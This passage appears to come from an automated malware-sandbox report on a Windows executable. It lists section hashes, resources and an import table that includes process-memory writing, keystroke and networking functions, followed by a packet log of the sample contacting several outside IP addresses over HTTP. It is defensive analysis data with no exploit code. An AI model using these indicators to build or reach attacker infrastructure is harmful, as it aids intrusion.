jc 00007F654D1A106Eh
rep movsd
jmp dword ptr [00000000h+edx*4]
Programming Language:
• [ C ] VS2010 SP1 build 40219
• [C++] VS2010 SP1 build 40219
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ASM] VS2010 SP1 build 40219
• [RES] VS2010 SP1 build 40219
• [LNK] VS2010 SP1 build 40219
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8d41c | 0x154 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xab000 | 0x9328 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x82000 | 0x844 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8061c | 0x80800 | 61ffce4768976fa0dd2a8f6a97b1417a | False | 0.5583182605787937 | data | 6.684690148171278 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x82000 | 0xdfc0 | 0xe000 | 0354bc5f2376b5e9a4a3ba38b682dff1 | False | 0.36085728236607145 | data | 4.799741132252136 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x90000 | 0x1a758 | 0x6800 | 8033f5a38941b4685bc2299e78f31221 | False | 0.15324519230769232 | data | 2.1500715391677487 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xab000 | 0x9328 | 0x9400 | 495451d7eb8326bd9fa2714869ea6de8 | False | 0.49002322635135137 | data | 5.541804843154628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xab5c8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xab6f0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xab818 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xab940 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | Great Britain | 0.48109756097560974
RT_ICON | 0xabfa8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | Great Britain | 0.5672043010752689
RT_ICON | 0xac290 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | Great Britain | 0.6418918918918919
RT_ICON | 0xac3b8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | Great Britain | 0.7044243070362474
RT_ICON | 0xad260 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | Great Britain | 0.8077617328519856
RT_ICON | 0xadb08 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | Great Britain | 0.5903179190751445
RT_ICON | 0xae070 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.5503112033195021
RT_ICON | 0xb0618 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.6050656660412758
RT_ICON | 0xb16c0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.7553191489361702
RT_MENU | 0xb1b28 | 0x50 | data | English | Great Britain | 0.9
RT_DIALOG | 0xb1b78 | 0xfc | data | English | Great Britain | 0.6507936507936508
RT_STRING | 0xb1c78 | 0x530 | data | English | Great Britain | 0.33960843373493976
RT_STRING | 0xb21a8 | 0x690 | data | English | Great Britain | 0.26964285714285713
RT_STRING | 0xb2838 | 0x4d0 | data | English | Great Britain | 0.36363636363636365
RT_STRING | 0xb2d08 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xb3308 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xb3968 | 0x388 | data | English | Great Britain | 0.377212389380531
RT_STRING | 0xb3cf0 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.502906976744186
RT_GROUP_ICON | 0xb3e48 | 0x84 | data | English | Great Britain | 0.6439393939393939
RT_GROUP_ICON | 0xb3ed0 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0xb3ee8 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0xb3f00 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0xb3f18 | 0x19c | data | English | Great Britain | 0.5339805825242718
RT_MANIFEST | 0xb40b8 | 0x26c | ASCII text, with CRLF line terminators | English | United States | 0.5145161290322581
DLL | Import
WSOCK32.dll | __WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
VERSION.dll | VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
MPR.dll | WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
PSAPI.DLL | EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
USERENV.dll | CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
KERNEL32.dll | HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
USER32.dll | GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
GDI32.dll | DeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
SHELL32.dll | DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
OLEAUT32.dll | VariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain | (map image not captured)
English | United States | (map image not captured)
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 9, 2024 14:05:50.561923981 CEST | 49869 | 80 | 192.168.2.7 | 195.110.124.133
Oct 9, 2024 14:05:50.566952944 CEST | 80 | 49869 | 195.110.124.133 | 192.168.2.7
Oct 9, 2024 14:05:50.567045927 CEST | 49869 | 80 | 192.168.2.7 | 195.110.124.133
Oct 9, 2024 14:05:50.575087070 CEST | 49869 | 80 | 192.168.2.7 | 195.110.124.133
Oct 9, 2024 14:05:50.580287933 CEST | 80 | 49869 | 195.110.124.133 | 192.168.2.7
Oct 9, 2024 14:05:51.247927904 CEST | 80 | 49869 | 195.110.124.133 | 192.168.2.7
Oct 9, 2024 14:05:51.248318911 CEST | 80 | 49869 | 195.110.124.133 | 192.168.2.7
Oct 9, 2024 14:05:51.248502016 CEST | 49869 | 80 | 192.168.2.7 | 195.110.124.133
Oct 9, 2024 14:05:51.252199888 CEST | 49869 | 80 | 192.168.2.7 | 195.110.124.133
Oct 9, 2024 14:05:51.257085085 CEST | 80 | 49869 | 195.110.124.133 | 192.168.2.7
Oct 9, 2024 14:06:06.308926105 CEST | 49946 | 80 | 192.168.2.7 | 13.248.169.48
Oct 9, 2024 14:06:06.314666986 CEST | 80 | 49946 | 13.248.169.48 | 192.168.2.7
Oct 9, 2024 14:06:06.314760923 CEST | 49946 | 80 | 192.168.2.7 | 13.248.169.48
Oct 9, 2024 14:06:06.326176882 CEST | 49946 | 80 | 192.168.2.7 | 13.248.169.48
Oct 9, 2024 14:06:06.331114054 CEST | 80 | 49946 | 13.248.169.48 | 192.168.2.7
Oct 9, 2024 14:06:06.777877092 CEST | 80 | 49946 | 13.248.169.48 | 192.168.2.7
Oct 9, 2024 14:06:06.777993917 CEST | 49946 | 80 | 192.168.2.7 | 13.248.169.48
Oct 9, 2024 14:06:07.835464001 CEST | 49946 | 80 | 192.168.2.7 | 13.248.169.48
Oct 9, 2024 14:06:07.840393066 CEST | 80 | 49946 | 13.248.169.48 | 192.168.2.7
Oct 9, 2024 14:06:08.853997946 CEST | 49961 | 80 | 192.168.2.7 | 13.248.169.48
Oct 9, 2024 14:06:08.859430075 CEST | 80 | 49961 | 13.248.169.48 | 192.168.2.7
Oct 9, 2024 14:06:08.859574080 CEST | 49961 | 80 | 192.168.2.7 | 13.248.169.48
Oct 9, 2024 14:06:08.870631933 CEST | 49961 | 80 | 192.168.2.7 | 13.248.169.48
Oct 9, 2024 14:06:08.875720024 CEST | 80 | 49961 | 13.248.169.48 | 192.168.2.7
Oct 9, 2024 14:06:09.322642088 CEST | 80 | 49961 | 13.248.169.48 | 192.168.2.7
Oct 9, 2024 14:06:09.322740078 CEST | 49961 | 80 | 192.168.2.7 | 13.248.169.48
Oct 9, 2024 14:06:10.382026911 CEST | 49961 | 80 | 192.168.2.7 | 13.248.169.48
Oct 9, 2024 14:06:10.387032032 CEST | 80 | 49961 | 13.248.169.48 | 192.168.2.7
Oct 9, 2024 14:06:11.596483946 CEST | 49971 | 80 | 192.168.2.7 | 13.248.169.48
Oct 9, 2024 14:06:11.601397991 CEST | 80 | 49971 | 13.248.169.48 | 192.168.2.7
Oct 9, 2024 14:06:11.601475954 CEST | 49971 | 80 | 192.168.2.7 | 13.248.169.48
Oct 9, 2024 14:06:11.670664072 CEST | 49971 | 80 | 192.168.2.7 | 13.248.169.48
Oct 9, 2024 14:06:11.675580978 CEST | 80 | 49971 | 13.248.169.48 | 192.168.2.7
Oct 9, 2024 14:06:11.675808907 CEST | 80 | 49971 | 13.248.169.48 | 192.168.2.7
Oct 9, 2024 14:06:12.091451883 CEST | 80 | 49971 | 13.248.169.48 | 192.168.2.7
Oct 9, 2024 14:06:12.091537952 CEST | 49971 | 80 | 192.168.2.7 | 13.248.169.48
Oct 9, 2024 14:06:13.179481030 CEST | 49971 | 80 | 192.168.2.7 | 13.248.169.48
Oct 9, 2024 14:06:13.184566021 CEST | 80 | 49971 | 13.248.169.48 | 192.168.2.7
Oct 9, 2024 14:06:14.222141981 CEST | 49976 | 80 | 192.168.2.7 | 13.248.169.48
Oct 9, 2024 14:06:14.227432966 CEST | 80 | 49976 | 13.248.169.48 | 192.168.2.7
Oct 9, 2024 14:06:14.227515936 CEST | 49976 | 80 | 192.168.2.7 | 13.248.169.48
Oct 9, 2024 14:06:14.321759939 CEST | 49976 | 80 | 192.168.2.7 | 13.248.169.48
Oct 9, 2024 14:06:14.326760054 CEST | 80 | 49976 | 13.248.169.48 | 192.168.2.7
Oct 9, 2024 14:06:14.708092928 CEST | 80 | 49976 | 13.248.169.48 | 192.168.2.7
Oct 9, 2024 14:06:14.711096048 CEST | 80 | 49976 | 13.248.169.48 | 192.168.2.7
Oct 9, 2024 14:06:14.711169004 CEST | 49976 | 80 | 192.168.2.7 | 13.248.169.48
Oct 9, 2024 14:06:14.751202106 CEST | 49976 | 80 | 192.168.2.7 | 13.248.169.48
Oct 9, 2024 14:06:14.756356001 CEST | 80 | 49976 | 13.248.169.48 | 192.168.2.7
Oct 9, 2024 14:06:19.798113108 CEST | 49977 | 80 | 192.168.2.7 | 188.114.96.3
Oct 9, 2024 14:06:19.803066969 CEST | 80 | 49977 | 188.114.96.3 | 192.168.2.7
Oct 9, 2024 14:06:19.803334951 CEST | 49977 | 80 | 192.168.2.7 | 188.114.96.3
Oct 9, 2024 14:06:19.814477921 CEST | 49977 | 80 | 192.168.2.7 | 188.114.96.3
Oct 9, 2024 14:06:19.819432020 CEST | 80 | 49977 | 188.114.96.3 | 192.168.2.7
Oct 9, 2024 14:06:20.954010963 CEST | 80 | 49977 | 188.114.96.3 | 192.168.2.7
Oct 9, 2024 14:06:20.954061031 CEST | 80 | 49977 | 188.114.96.3 | 192.168.2.7
Oct 9, 2024 14:06:20.954094887 CEST | 80 | 49977 | 188.114.96.3 | 192.168.2.7
Oct 9, 2024 14:06:20.954166889 CEST | 49977 | 80 | 192.168.2.7 | 188.114.96.3
Oct 9, 2024 14:06:21.319575071 CEST | 49977 | 80 | 192.168.2.7 | 188.114.96.3
Oct 9, 2024 14:06:22.342711926 CEST | 49978 | 80 | 192.168.2.7 | 188.114.96.3
Oct 9, 2024 14:06:22.347759008 CEST | 80 | 49978 | 188.114.96.3 | 192.168.2.7
Oct 9, 2024 14:06:22.347862959 CEST | 49978 | 80 | 192.168.2.7 | 188.114.96.3
Oct 9, 2024 14:06:22.359015942 CEST | 49978 | 80 | 192.168.2.7 | 188.114.96.3
Oct 9, 2024 14:06:22.363908052 CEST | 80 | 49978 | 188.114.96.3 | 192.168.2.7
Oct 9, 2024 14:06:23.353688002 CEST | 80 | 49978 | 188.114.96.3 | 192.168.2.7
Oct 9, 2024 14:06:23.354357958 CEST | 80 | 49978 | 188.114.96.3 | 192.168.2.7
Oct 9, 2024 14:06:23.354429960 CEST | 49978 | 80 | 192.168.2.7 | 188.114.96.3
Oct 9, 2024 14:06:23.885879993 CEST | 49978 | 80 | 192.168.2.7 | 188.114.96.3
Oct 9, 2024 14:06:24.901242971 CEST | 49979 | 80 | 192.168.2.7 | 188.114.96.3
Oct 9, 2024 14:06:24.906352043 CEST | 80 | 49979 | 188.114.96.3 | 192.168.2.7
Oct 9, 2024 14:06:24.906471968 CEST | 49979 | 80 | 192.168.2.7 | 188.114.96.3
Oct 9, 2024 14:06:24.917965889 CEST | 49979 | 80 | 192.168.2.7 | 188.114.96.3
Oct 9, 2024 14:06:24.922907114 CEST | 80 | 49979 | 188.114.96.3 | 192.168.2.7
Oct 9, 2024 14:06:24.923280954 CEST | 80 | 49979 | 188.114.96.3 | 192.168.2.7
Oct 9, 2024 14:06:25.838443995 CEST | 80 | 49979 | 188.114.96.3 | 192.168.2.7
Oct 9, 2024 14:06:25.840312004 CEST | 80 | 49979 | 188.114.96.3 | 192.168.2.7
Oct 9, 2024 14:06:25.840415001 CEST | 49979 | 80 | 192.168.2.7 | 188.114.96.3
Oct 9, 2024 14:06:26.431512117 CEST | 49979 | 80 | 192.168.2.7 | 188.114.96.3
Oct 9, 2024 14:06:27.550175905 CEST | 49980 | 80 | 192.168.2.7 | 188.114.96.3
Oct 9, 2024 14:06:27.555767059 CEST | 80 | 49980 | 188.114.96.3 | 192.168.2.7
Oct 9, 2024 14:06:27.555887938 CEST | 49980 | 80 | 192.168.2.7 | 188.114.96.3
Oct 9, 2024 14:06:27.600434065 CEST | 49980 | 80 | 192.168.2.7 | 188.114.96.3
Oct 9, 2024 14:06:27.605480909 CEST | 80 | 49980 | 188.114.96.3 | 192.168.2.7
Oct 9, 2024 14:06:28.510396004 CEST | 80 | 49980 | 188.114.96.3 | 192.168.2.7
Oct 9, 2024 14:06:28.510458946 CEST | 80 | 49980 | 188.114.96.3 | 192.168.2.7
Oct 9, 2024 14:06:28.510499001 CEST | 80 | 49980 | 188.114.96.3 | 192.168.2.7
Oct 9, 2024 14:06:28.510536909 CEST | 80 | 49980 | 188.114.96.3 | 192.168.2.7
Oct 9, 2024 14:06:28.510541916 CEST | 49980 | 80 | 192.168.2.7 | 188.114.96.3
Oct 9, 2024 14:06:28.510653019 CEST | 49980 | 80 | 192.168.2.7 | 188.114.96.3
Oct 9, 2024 14:06:28.510840893 CEST | 80 | 49980 | 188.114.96.3 | 192.168.2.7
Oct 9, 2024 14:06:28.510890961 CEST | 49980 | 80 | 192.168.2.7 | 188.114.96.3
Oct 9, 2024 14:06:28.514362097 CEST | 49980 | 80 | 192.168.2.7 | 188.114.96.3
Oct 9, 2024 14:06:28.519179106 CEST | 80 | 49980 | 188.114.96.3 | 192.168.2.7
Oct 9, 2024 14:06:33.947453976 CEST | 49981 | 80 | 192.168.2.7 | 3.33.130.190
Oct 9, 2024 14:06:33.952495098 CEST | 80 | 49981 | 3.33.130.190 | 192.168.2.7
Oct 9, 2024 14:06:33.952591896 CEST | 49981 | 80 | 192.168.2.7 | 3.33.130.190
Oct 9, 2024 14:06:33.967888117 CEST | 49981 | 80 | 192.168.2.7 | 3.33.130.190
Oct 9, 2024 14:06:34.223994970 CEST | 80 | 49981 | 3.33.130.190 | 192.168.2.7
Oct 9, 2024 14:06:34.441385031 CEST | 80 | 49981 | 3.33.130.190 | 192.168.2.7
Oct 9, 2024 14:06:34.441458941 CEST | 49981 | 80 | 192.168.2.7 | 3.33.130.190
Oct 9, 2024 14:06:35.475939035 CEST | 49981 | 80 | 192.168.2.7 | 3.33.130.190
Oct 9, 2024 14:06:35.481441975 CEST | 80 | 49981 | 3.33.130.190 | 192.168.2.7
Oct 9, 2024 14:06:36.494916916 CEST | 49982 | 80 | 192.168.2.7 | 3.33.130.190
Oct 9, 2024 14:06:36.499931097 CEST | 80 | 49982 | 3.33.130.190 | 192.168.2.7
Oct 9, 2024 14:06:36.500039101 CEST | 49982 | 80 | 192.168.2.7 | 3.33.130.190
Oct 9, 2024 14:06:36.511487961 CEST | 49982 | 80 | 192.168.2.7 | 3.33.130.190
Oct 9, 2024 14:06:36.516350031 CEST | 80 | 49982 | 3.33.130.190 | 192.168.2.7
Oct 9, 2024 14:06:38.022833109 CEST | 49982 | 80 | 192.168.2.7 | 3.33.130.190
Oct 9, 2024 14:06:38.028217077 CEST | 80 | 49982 | 3.33.130.190 | 192.168.2.7
Oct 9, 2024 14:06:38.028281927 CEST | 49982 | 80 | 192.168.2.7 | 3.33.130.190
Oct 9, 2024 14:06:39.041260004 CEST | 49983 | 80 | 192.168.2.7 | 3.33.130.190
Oct 9, 2024 14:06:39.046257019 CEST | 80 | 49983 | 3.33.130.190 | 192.168.2.7
Oct 9, 2024 14:06:39.046379089 CEST | 49983 | 80 | 192.168.2.7 | 3.33.130.190
Oct 9, 2024 14:06:39.058021069 CEST | 49983 | 80 | 192.168.2.7 | 3.33.130.190
Oct 9, 2024 14:06:39.063241005 CEST | 80 | 49983 | 3.33.130.190 | 192.168.2.7
Oct 9, 2024 14:06:39.063306093 CEST | 80 | 49983 | 3.33.130.190 | 192.168.2.7
Oct 9, 2024 14:06:39.549561024 CEST | 80 | 49983 | 3.33.130.190 | 192.168.2.7
Oct 9, 2024 14:06:39.549890995 CEST | 49983 | 80 | 192.168.2.7 | 3.33.130.190
Oct 9, 2024 14:06:40.569647074 CEST | 49983 | 80 | 192.168.2.7 | 3.33.130.190
Oct 9, 2024 14:06:40.574672937 CEST | 80 | 49983 | 3.33.130.190 | 192.168.2.7
Oct 9, 2024 14:06:41.641750097 CEST | 49984 | 80 | 192.168.2.7 | 3.33.130.190
Oct 9, 2024 14:06:41.647128105 CEST | 80 | 49984 | 3.33.130.190 | 192.168.2.7
Oct 9, 2024 14:06:41.647201061 CEST | 49984 | 80 | 192.168.2.7 | 3.33.130.190
Oct 9, 2024 14:06:41.706000090 CEST | 49984 | 80 | 192.168.2.7 | 3.33.130.190
Oct 9, 2024 14:06:41.711347103 CEST | 80 | 49984 | 3.33.130.190 | 192.168.2.7
Oct 9, 2024 14:06:49.193428040 CEST | 80 | 49984 | 3.33.130.190 | 192.168.2.7
Oct 9, 2024 14:06:49.193572044 CEST | 80 | 49984 | 3.33.130.190 | 192.168.2.7
Oct 9, 2024 14:06:49.193628073 CEST | 49984 | 80 | 192.168.2.7 | 3.33.130.190
Oct 9, 2024 14:06:49.196461916 CEST | 49984 | 80 | 192.168.2.7 | 3.33.130.190
Oct 9, 2024 14:06:49.201251030 CEST | 80 | 49984 | 3.33.130.190 | 192.168.2.7
Oct 9, 2024 14:06:54.239113092 CEST | 49985 | 80 | 192.168.2.7 | 162.0.238.238
Oct 9, 2024 14:06:54.244800091 CEST | 80 | 49985 | 162.0.238.238 | 192.168.2.7
Oct 9, 2024 14:06:54.249769926 CEST | 49985 | 80 | 192.168.2.7 | 162.0.238.238
Oct 9, 2024 14:06:54.263029099 CEST | 49985 | 80 | 192.168.2.7 | 162.0.238.238
Oct 9, 2024 14:06:54.267863035 CEST | 80 | 49985 | 162.0.238.238 | 192.168.2.7
Oct 9, 2024 14:06:55.773010969 CEST | 49985 | 80 | 192.168.2.7 | 162.0.238.238
Oct 9, 2024 14:06:55.820785046 CEST | 80 | 49985 | 162.0.238.238 | 192.168.2.7
